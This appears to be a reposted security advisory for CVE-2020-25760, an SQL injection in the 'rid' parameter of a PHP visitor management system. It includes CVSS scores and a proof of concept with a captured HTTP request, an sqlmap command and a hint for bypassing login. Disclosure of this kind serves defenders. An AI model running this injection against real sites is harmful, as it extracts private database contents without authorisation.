Visitor Management System In PHP 1.0 SQL Injection

2020.09.23
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Title: Visitor Management System in PHP 1.0 - Authenticated SQL Injection # Exploit Author: Rahul Ramkumar # Date: 2020-09-16 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2020/07/Visitor-Management-System-in-PHP.zip # Version: 1.0 # Tested On: Windows 10 Enterprise 1809 (x64_86) + XAMPP 7.2.33-1 # CVE: CVE-2020-25760 # Description The file front.php does not perform input validation on the 'rid' parameter. An attacker can append SQL queries to the input to extract sensitive information from the database. Note: This exploit can work pre-authentication as well, but need to change the 302 Response to 200 using an intercept tool. It should be pretty straight forward so I have not shown how. #POC 1) Navigate to the login page Example: http://192.168.1.72/visitor_management/index.php 2) Enter 'username' and 'password' 3) On the homepage, click on any visitor name and intercept the request 4) Save the request to file. Example, visitor_management_sqli.req GET /visitor_management/front.php?rid=373568 HTTP/1.1 Host: 192.168.1.72 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.72/visitor_management/front.php Cookie: PHPSESSID=emvdv3k52ngs7uf0gliajb13ef Upgrade-Insecure-Requests: 1 5) Run SQLmap on the file, sqlmap -r visitor_management_sqli.req --dbms=mysql --threads=10


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top